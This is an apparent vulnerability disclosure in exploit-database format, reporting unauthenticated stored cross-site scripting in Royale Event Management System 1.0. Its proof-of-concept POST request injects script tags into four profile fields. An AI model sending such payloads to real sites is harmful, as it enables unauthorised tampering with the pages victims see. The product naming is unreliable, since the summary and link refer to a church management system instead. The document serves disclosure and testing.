# Exploit Title: Royale Event Management System 1.0 - Cross-site Scripting
Stored (unauthenticated)
# Date: 17/03/2022
# Exploit Author: Mr Empy
# Software Link:
https://www.sourcecodester.com/php/15225/church-management-software-free-download-full-version.html
# Version: 1.0
# Tested on: Linux

Title:
================
Royale Event Management System 1.0 - Cross-site Scripting Stored
(unauthenticated)


Summary:
================
One Church Management System is affected by Cross-site Scripting
vulnerability due to poor hygiene in certain parameters. The attacker could
leverage this flaw to inject arbitrary javascript code to manipulate the
victim's browser capabilities.


Severity Level:
================
6.5 (Medium)
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N


Affected Product:
================
Royale Event Management System v1.0


Steps to Reproduce:
================

* companyprofile.php XSS (unauthenticated) PoC:

POST /royal_event/companyprofile.php HTTP/1.1
Host: target.com
Content-Length: 187
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://target.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://target.com/royal_event/churchprofile.php
Accept-Encoding: gzip, deflate
Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

companyname="><script>alert("XSS")</script>&regno="><script>alert("XSS")</script>&companyaddress="><script>alert("XSS")</script>&companyemail="><script>alert("XSS")</script>&country=India&mobilenumber=%2B919423979339&submit=